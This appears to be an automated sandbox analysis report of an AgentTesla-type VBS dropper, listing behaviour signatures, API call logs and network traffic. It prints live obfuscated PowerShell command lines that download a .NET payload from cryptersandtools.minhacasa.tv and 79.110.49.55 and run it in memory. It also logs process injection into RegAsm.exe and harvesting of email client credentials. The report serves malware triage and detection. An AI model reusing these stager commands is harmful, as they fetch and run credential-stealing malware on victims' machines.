Data received	CogCHogCKoQChIoEJEigS0wBTMwAOIAIFgwAdggDEcwBIogAHQAzBKBCF0RADASCK0REBAQBIkQCJkACGcACMHoEF0RAgcQCdERAdMYEVEAIKgACIgACIEgBgkACIgACIgACHcQCdERCBASBNHoEMHoEIHYECAyCIkgCK0cgSkACF0BCH0gCKEgAgUgCF0RAAUACF0RgAKhCEcQCKkQAgQACF0RBdUQHBCoEFcADMHoEBEAIGcQBdEAAFgQBdUQHF0RgAKhCGcQDJkQAgQACHcQBdQwBHwcgSEQLSUBxBKBECIAAOwcgSEQNRUxBIwcgSEQNRUhAMHoEEHoEO4AzBKRAtIRFIcgGF0BEMHoECIAIJggAZIxAHYgCKogAAUgApMYENHoEBMAIKEygRogCCAyBIggCF0RzBKRBdYwBM0cgSwcgSIgAgkgDMHoECIAIH0REOEgAAYAC5GoEC4ABHgAzBKRAtIRFAASCdERAdMYEVcACF0xBCAgBI0REB0xgRUBzBKBzBKRgAKRHRkQCHcwBKoQCJcgAJgAzBKRAtIRFUcQKIgQBdEwAgcACKgQCJUwBH4gDOgcgREABgkQpBGhDCIAIHgACO0BCO0xAO4QHO4QHOggDNcwEMHoEB0iEVcACMHoEMHoEDcQCO0RENHoEOgcgRwcgSUAIP4gDOgcgRwcgSQAILgAzBKRuBKxAHkgAFHYENHoEEHoEDAADFHYEOQcgSIAAJgQmBKBxBKRzBKBBHwAxBKBAAUACEHoEZIxAHggAO0cgSQcgSMAAKgAxBKBxBKxAHkgDOQcgSIAAHUcgREcgR4QADAiCIQcgS0cgSMwBJgQgAKRAAYACJgwAHUQgAKhBEkQHGMQxBGhBE0cgSYABMHoEB0iEVYACIkhEO4QAEAAC1LoEBEAIGUxgSEQAgYgDOEgAgUgDO0cgSEwAggQ/CKRARMoEVgQDDKBAgUQCDKBAgUQ+CKRzBKRACASCxLoExLoEBIAIJgQHR0REdERHRUwgSEwgS0vgSkvgSkhEF0R9CKR8CKR8CKhDHQSGSAAAEktgS0qgS0cgSEwAgwQyCGR7CGR7CGRADACDKUtgSEgAgcQ1CKhBEErgSAAAFEtgS0BAgYQ6CKR3CKRAAgACIEgAgUQ4CGBAgUQ5CKBAAUAChLYEhLYEhLYEhLYEZIRGS0tgSktgS0qgSUtgSEtgS0sgSksgR4wBo4QtCKhDCAwBIgQMSUQHEcACcIQAAQQgCKBAgUQxCKBAgUACFLoEOEngS4QuCKhBH4gDBLoEBAiB9KoEAASBIEngSEQdCKRFOEngSkngSkrgS4wBHYRtCKBAAUgDdCoEdEAAHgACdCoEd0JgS0JgS0BCOcwBRErgS0qgSEAAI0UENFhACAwBtKoEdAAAGgQrCKRHIMwBIAgHBEqgSUBAeEQoCKRFBEAERAgHBUqgSUxBAMBCBIAIGAgHBEqgSUxBIAgHIUQHI0pgSYwBMkogSAAIFUpgSEQAgYQlCKBAAUgDNKoEBAgBI4gDpEoENHoEJKoEFKoEHcQEIgQHR4ABHcAsBGhBEAbgR4QAAYQDOEAAEgQDNIAAFsQDBAABLAAIDEngSEQdCKRFIAwEBUngSUBAgkQcCKRAxDoEVgQcCKRAKUQfCKBAeEQ8AKRFBEAENkngSAAIFgQcCKRA1JoEVAbgR4QcCKRbCKRaCKxBHgBCO0hDdMwBHgACF0RBxIRBHkACO4gDOQAAHggD

Poweshell is sending data to a remote host (2 events)

Data sent	GET /e/e HTTP/1.1 Host: cryptersandtools.minhacasa.tv Connection: Keep-Alive
Data sent	GET /aby.txt HTTP/1.1 Host: 79.110.49.55 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 7, 2023, 9:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 7, 2023, 9:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 7, 2023, 9:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (12 events)

description	Win Trojan AgentTesla	rule	Win_Trojan_AgentTesla_M_Zero
description	Communications smtp	rule	Network_SMTP_dotNet
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Run a KeyLogger	rule	KeyLogger

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess July 7, 2023, 9:19 a.m.	status_code: 0xffffffff process_identifier: 3004 process_handle: 0x0000033c		0	0
NtTerminateProcess July 7, 2023, 9:19 a.m.	status_code: 0xffffffff process_identifier: 3004 process_handle: 0x0000033c	1	0	0

Communicates with host for which no DNS query was performed (1 event)

host

79.110.49.55

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 3004 region_size: 196608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000494		3221225496	0
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 3040 region_size: 196608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000036c	1	0	0

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2880 manipulating memory of non-child process 3004
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 3004 region_size: 196608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000494		3221225496	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅ¡dà0>¥ @ @ì¤OÀFà H.textD `.rsrcFÀ@@.relocà@B base_address: 0x00400000 process_identifier: 3040 process_handle: 0x0000036c	1	1
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: P8h À¼\Ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee98985aa-1a0a-4027-b0e4-a37605f1db47.exe(LegalCopyright \|)OriginalFilenamee98985aa-1a0a-4027-b0e4-a37605f1db47.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042c000 process_identifier: 3040 process_handle: 0x0000036c	1	1
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: @5 base_address: 0x0042e000 process_identifier: 3040 process_handle: 0x0000036c	1	1
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3040 process_handle: 0x0000036c	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅ¡dà0>¥ @ @ì¤OÀFà H.textD `.rsrcFÀ@@.relocà@B base_address: 0x00400000 process_identifier: 3040 process_handle: 0x0000036c	1	1	0

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send July 7, 2023, 9:19 a.m.	buffer: GET /e/e HTTP/1.1 Host: cryptersandtools.minhacasa.tv Connection: Keep-Alive socket: 1436 sent: 82	1	82	0
send July 7, 2023, 9:19 a.m.	buffer: GET /aby.txt HTTP/1.1 Host: 79.110.49.55 Connection: Keep-Alive socket: 1432 sent: 69	1	69	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2880 called NtSetContextThread to modify thread in remote process 3040
NtSetContextThread July 7, 2023, 9:19 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4367678 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000033c process_identifier: 3040	1	0	0

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process	wscript.exe	martian_process	powershell -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.yba/55.94.011.97//:ptth'))"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2880 resumed a thread in remote process 3040
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 3040	1	0	0

Creates a suspicious Powershell process (6 events)

option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

Executed a process and injected code into it, probably while unpacking (31 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 7, 2023, 9:19 a.m.	thread_identifier: 2748 thread_handle: 0x000002e8 process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f0	1	1
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2744	1	0
CreateProcessInternalW July 7, 2023, 9:19 a.m.	thread_identifier: 2884 thread_handle: 0x00000448 process_identifier: 2880 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.yba/55.94.011.97//:ptth'))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000044c	1	1
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 2880	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000002f8 suspend_count: 1 process_identifier: 2880	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x0000045c suspend_count: 1 process_identifier: 2880	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000580 suspend_count: 1 process_identifier: 2880	1	0
CreateProcessInternalW July 7, 2023, 9:19 a.m.	thread_identifier: 3008 thread_handle: 0x00000490 process_identifier: 3004 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000494	1	1
NtGetContextThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000490	1	0
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 3004 region_size: 196608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000494		3221225496
CreateProcessInternalW July 7, 2023, 9:19 a.m.	thread_identifier: 3044 thread_handle: 0x0000033c process_identifier: 3040 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000036c	1	1
NtGetContextThread July 7, 2023, 9:19 a.m.	thread_handle: 0x0000033c	1	0
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 3040 region_size: 196608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000036c	1	0
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅ¡dà0>¥ @ @ì¤OÀFà H.textD `.rsrcFÀ@@.relocà@B base_address: 0x00400000 process_identifier: 3040 process_handle: 0x0000036c	1	1
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: base_address: 0x00402000 process_identifier: 3040 process_handle: 0x0000036c	1	1
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: P8h À¼\Ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee98985aa-1a0a-4027-b0e4-a37605f1db47.exe(LegalCopyright \|)OriginalFilenamee98985aa-1a0a-4027-b0e4-a37605f1db47.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042c000 process_identifier: 3040 process_handle: 0x0000036c	1	1
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: @5 base_address: 0x0042e000 process_identifier: 3040 process_handle: 0x0000036c	1	1
WriteProcessMemory July 7, 2023, 9:19 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3040 process_handle: 0x0000036c	1	1
NtSetContextThread July 7, 2023, 9:19 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4367678 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000033c process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 2880	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000178 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000001f0 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread July 7, 2023, 9:19 a.m.	thread_handle: 0x000003f0 suspend_count: 1 process_identifier: 3040	1	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

abnc.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All